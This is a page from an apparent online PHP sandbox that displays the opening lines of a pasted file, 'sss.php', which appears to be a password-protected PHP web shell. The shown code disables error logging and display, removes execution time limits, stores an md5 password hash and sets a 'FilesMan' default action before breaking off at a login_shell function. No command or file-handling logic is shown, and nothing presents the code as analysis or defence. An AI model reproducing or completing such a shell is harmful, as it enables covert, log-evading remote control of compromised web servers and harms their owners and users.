sss - PHP Online

Form of PHP Sandbox

Enter Your PHP code here for testing/debugging in the Online PHP Sandbox. As in the usual PHP files, you can also add HTML, but do not forget to add the tag <?php in the places where the PHP script should be executed.



Your result can be seen below.

Result of php executing





Full code of sss.php

  1. <?php
  2. session_start();
  3. @set_time_limit(0);
  4. @clearstatcache();
  5. @ini_set('error_log', NULL);
  6. @ini_set('log_errors', 0);
  7. @ini_set('max_execution_time', 0);
  8. @ini_set('output_buffering', 0);
  9. @ini_set('display_errors', 0);
  10.  
  11. /* konfigurasi */
  12. /* Password using md5 hashes */
  13. $password = "2ecdf565d44933226cc6709c761c0acd";
  14. $default_action = "FilesMan";
  15. $default_use_ajax = true;
  16. $default_charset = 'UTF-8';
  17. date_default_timezone_set("Asia/Jakarta");
  18. function login_shell()
  19. {
  20. ?>
File Description
  • sss
  • PHP Code
  • 01 Jul-2024
  • 489 Bytes
You can Share it: